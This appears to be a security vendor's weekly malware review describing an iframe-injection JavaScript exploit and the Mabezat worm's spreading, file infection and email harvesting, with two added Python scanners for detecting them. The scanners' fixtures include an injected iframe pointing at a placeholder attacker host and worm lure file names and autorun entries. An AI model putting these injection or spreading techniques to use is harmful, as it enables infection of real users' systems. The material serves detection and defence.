Weekly Review - Wormania
Trojan.Exploit.ANPT
Yet another variation of the common JavaScript exploits that roam the wild wild web. It creates a 111 pixel wide iframe on infected websites that loads a specially crafted URL, which in turn uses browser-specific exploits to gain control over vulnerable computers.
It uses cookies to mark systems it has already infected.
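The following Python scan is an added illustration and is not part of the original write-up or of Bitdefender's tooling. It flags the kind of frame the description refers to: an off-site iframe that is either very narrow (the 111 px width is the figure from the write-up; the 120 px cut-off is an assumption) or hidden with CSS, including frames that an inline script writes out as a literal string. The sample page and the host attacker.example.net are constructed placeholders, not indicators from the report.

```python
"""Heuristic scan for injected, near-invisible iframes (added example).

Flags <iframe> elements that point off-site and are either tiny (the sample
above used a 111 px wide frame) or hidden with CSS. Iframes written out as
literal strings by inline document.write() calls are extracted and checked
too; split or encoded strings ('<ifr'+'ame', \\x3c...) are not handled.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Anything at or below this width is treated as "not meant to be seen".
# 111 px is the figure from the write-up; 120 as the cut-off is an assumption.
SMALL_WIDTH_PX = 120

_WIDTH_RE = re.compile(r"width\s*:\s*(\d+)\s*px", re.I)
_HIDDEN_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
_SCRIPT_IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)


class _IframeCollector(HTMLParser):
    """Collects iframe attribute dicts and the raw text of <script> blocks."""

    def __init__(self):
        super().__init__()
        self.iframes = []
        self.script_text = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script_text.append(data)


def _iframe_width(attrs):
    """Pixel width from width="111" / width="111px" or style="width:111px"."""
    w = attrs.get("width", "").strip().lower().rstrip("px")
    if w.isdigit():
        return int(w)
    m = _WIDTH_RE.search(attrs.get("style", ""))
    return int(m.group(1)) if m else None


def find_suspicious_iframes(html, page_url):
    """Return (src, reason) for every off-site iframe that is tiny or hidden."""
    page_host = urlparse(page_url).hostname
    col = _IframeCollector()
    col.feed(html)
    # Second pass: iframes emitted from inline scripts as literal markup.
    script_blob = "".join(col.script_text).replace("\\/", "/")
    for tag in _SCRIPT_IFRAME_RE.findall(script_blob):
        sub = _IframeCollector()
        sub.feed(tag)
        col.iframes.extend(sub.iframes)

    findings = []
    for attrs in col.iframes:
        src = attrs.get("src", "")
        host = urlparse(src).hostname
        if not host or host == page_host:
            continue  # relative or same-host frames are the site's own content
        if _HIDDEN_RE.search(attrs.get("style", "")):
            findings.append((src, "hidden by CSS, off-site"))
            continue
        width = _iframe_width(attrs)
        if width is not None and width <= SMALL_WIDTH_PX:
            findings.append((src, f"{width}px wide, off-site"))
    return findings


# Constructed sample page: one legitimate same-host embed, one injected 111 px
# frame, and one written by an inline script. attacker.example.net is a
# placeholder host, not a real indicator from the write-up.
SAMPLE_HTML = """<html><body>
<iframe src="https://www.example.com/player" width="800" height="450"></iframe>
<iframe src="http://attacker.example.net/in.cgi?3" width="111" height="1"></iframe>
<script>document.write('<iframe src="http://attacker.example.net/x.php" style="width:111px;height:1px"></iframe>');</script>
</body></html>"""

if __name__ == "__main__":
    for src, why in find_suspicious_iframes(SAMPLE_HTML, "https://www.example.com/index.html"):
        print(f"{why}: {src}")
```

Run against a crawl of your own pages, the two findings on the sample are the 111 px frame and the script-written one; the 800 px same-host player is left alone. The width threshold is deliberately a heuristic: a legitimately small widget on a third-party host will show up too and has to be whitelisted by hand.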
Win32.Worm.Mabezat.J
This worm hides behind a friendly folder-like icon meant to trick users into clicking it. Upon execution it opens its parent folder (so it behaves the way a normal folder would), but it also creates an autorun.inf file on each drive and copies itself there under the name zPharaoh.exe. It creates a folder named tazebama in the current user's %AppData% directory.
It modifies the registry to ensure the Autorun feature is not disabled.
The worm also infects executable files by replacing 1768 bytes starting at the entry point with its own encrypted code. It can infect files on any drive that is not write-protected, including removable drives.
If an infected file is executed, it drops another file named tazebama.dll into %documents and settings% and creates further copies of itself there. It also executes %documents and settings%\hook.dl_, which stays memory-resident even after its parent process has terminated. The tazebama.dll library is loaded by every infected running process and hooks several API functions (operating system routines) in order to infect more files.
The virus can mis-infect installer kits or ordinary programs, causing them to function incorrectly or damaging them permanently. The memory-resident code makes sure that zPharaoh.exe and autorun.inf are copied to every drive (including network shares, if they are mapped as a drive).
It maintains a log file (zPharaoh.dat) in the current user's %AppData% directory. This log begins with the string "tazebama trojan log file" and is used to store e-mail addresses harvested from .XML, .PHP, .LOG, .CHM, .HLP, .CPP, .PAS, .XLS, .PPT, .PDF, .ASPX, .ASP, .HTML, .HTM, .RTF and .TXT files found on the infected system.
The worm can also spread over the local network: when a share is accessed it infects it by placing two copies of itself in every directory. The name of the first copy varies and may be one of the following: WinrarSerialInstall.exe, KasperSky 6.0 key.doc.exe, NokiaN73Tools.exe, Office2007 serial.txt.exe, Make Windows Original.exe. The second copy has the same name as the directory it is placed in.
It is also a mass mailer, using its own SMTP engine to send e-mails to the addresses harvested from the victim's computer.
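As an added triage example (not Bitdefender's code and not part of the original write-up), the Python script below walks drive roots and a share looking for the file-system artefacts listed in the preceding paragraphs: an autorun.inf that launches zPharaoh.exe, the dropper itself, the lure file names, a copy named after its directory, the tazebama folder and the zPharaoh.dat log. The directory layout, file contents and e-mail address in the fixture are constructed; a clean drive with a vendor autorun.inf is included to show that the autorun rule fires only when the launched file is zPharaoh.exe. The 1768-byte entry-point check on infected executables needs a known-clean copy of each file and is left out.

```python
"""Triage scan for the Win32.Worm.Mabezat.J file-system artefacts described
above (added example, not Bitdefender's tooling).

Looks for: an autorun.inf that launches zPharaoh.exe, the zPharaoh.exe
dropper, the share lure names, a <dir>\\<dir>.exe companion copy, the
%AppData%\\tazebama folder and a zPharaoh.dat log that begins with
"tazebama trojan log file". Verifying the 1768-byte entry-point patch in
infected PEs needs a clean reference copy and is out of scope here.
"""
import configparser
import os
import tempfile
from pathlib import Path

DROPPER = "zpharaoh.exe"
LOG_NAME = "zpharaoh.dat"
LOG_MAGIC = b"tazebama trojan log file"
LURE_NAMES = {"winrarserialinstall.exe", "kaspersky 6.0 key.doc.exe", "nokian73tools.exe",
              "office2007 serial.txt.exe", "make windows original.exe"}
# autorun.inf keys whose value names something Windows will execute
AUTORUN_KEYS = ("open", "shellexecute", "shell\\open\\command", "shell\\explore\\command")


def autorun_targets(text):
    """Executables an autorun.inf would run, lower-cased; [] if unparsable."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(text)
    except configparser.Error:
        return []
    targets = []
    for section in cp.sections():
        if section.lower() != "autorun":
            continue
        for key in AUTORUN_KEYS:
            value = cp.get(section, key, fallback="").strip()
            if value:  # 'open="zPharaoh.exe" /x' -> 'zpharaoh.exe'
                targets.append(value.split()[0].strip('"').lower())
    return targets


def scan_for_mabezat(roots, appdata):
    """Walk each root plus %AppData%; return sorted (indicator, path) pairs."""
    findings = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            d = Path(dirpath)
            for name in files:
                low, p = name.lower(), d / name
                if low == "autorun.inf":
                    if DROPPER in autorun_targets(p.read_text(errors="replace")):
                        findings.append(("autorun.inf launches zPharaoh.exe", str(p)))
                elif low == DROPPER:
                    findings.append(("zPharaoh.exe dropper", str(p)))
                elif low in LURE_NAMES:
                    findings.append(("share lure file name", str(p)))
                elif d.name and low == d.name.lower() + ".exe":
                    findings.append(("copy named after its directory", str(p)))
    appdata = Path(appdata)
    if (appdata / "tazebama").is_dir():
        findings.append(("tazebama folder in %AppData%", str(appdata / "tazebama")))
    log = appdata / LOG_NAME
    if log.is_file() and log.read_bytes().startswith(LOG_MAGIC):
        findings.append(("zPharaoh.dat harvest log", str(log)))
    return sorted(findings)


def build_sample_tree(base):
    """Constructed fixture: infected 'drive' E, an infected share, a clean
    drive F with a vendor autorun.inf, and an %AppData%. Placeholder bytes only."""
    base = Path(base)
    drive, share, clean, appdata = (base / n for n in ("E", "share", "F", "AppData"))
    drive.mkdir()
    (drive / "autorun.inf").write_text("[autorun]\nopen=zPharaoh.exe\nshellexecute=zPharaoh.exe\n")
    (drive / "zPharaoh.exe").write_bytes(b"MZ")
    (share / "Reports").mkdir(parents=True)
    (share / "Reports" / "Office2007 serial.txt.exe").write_bytes(b"MZ")
    (share / "Reports" / "Reports.exe").write_bytes(b"MZ")
    (share / "Reports" / "Q3.xls").write_bytes(b"\xd0\xcf\x11\xe0")  # benign, must not be flagged
    clean.mkdir()
    (clean / "autorun.inf").write_text("[autorun]\nopen=setup.exe\nicon=setup.exe,0\n")
    (appdata / "tazebama").mkdir(parents=True)
    (appdata / LOG_NAME).write_bytes(LOG_MAGIC + b"\r\nuser@example.com\r\n")
    return [drive, share, clean], appdata


def demo():
    """Build the fixture in a temp dir, scan it, return the indicators hit."""
    with tempfile.TemporaryDirectory() as tmp:
        roots, appdata = build_sample_tree(tmp)
        return [ind for ind, _ in scan_for_mabezat(roots, appdata)]


if __name__ == "__main__":
    print("\n".join(demo()))
```

On a live host you would pass the real drive letters and the current user's %AppData% path instead of the fixture. The autorun.inf parser resolves the keys Windows actually acts on rather than string-matching the file, so a vendor autorun.inf that launches setup.exe is not reported while one launching zPharaoh.exe is, even when the value is quoted or carries arguments.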
Common subjects of the spam emails are: "ABOUT PEOPLE WITH WHOM MATRIMONY IS PROHIBITED", "Windows secrets", "Canada immigration", "Viruses history", "Web designer vacancy", "problem" etc.
In each case the attachment is the actual virus. The e-mails may also contain the string "The original file name is %s and compressed by WinRAR no virus found. Use WinRAR to decompress the file." (where %s is the file name).
Information in this article is available courtesy of BitDefender virus researchers: Lutas Andrei Vlad
Copyright 2011. Site powered by Bitdefender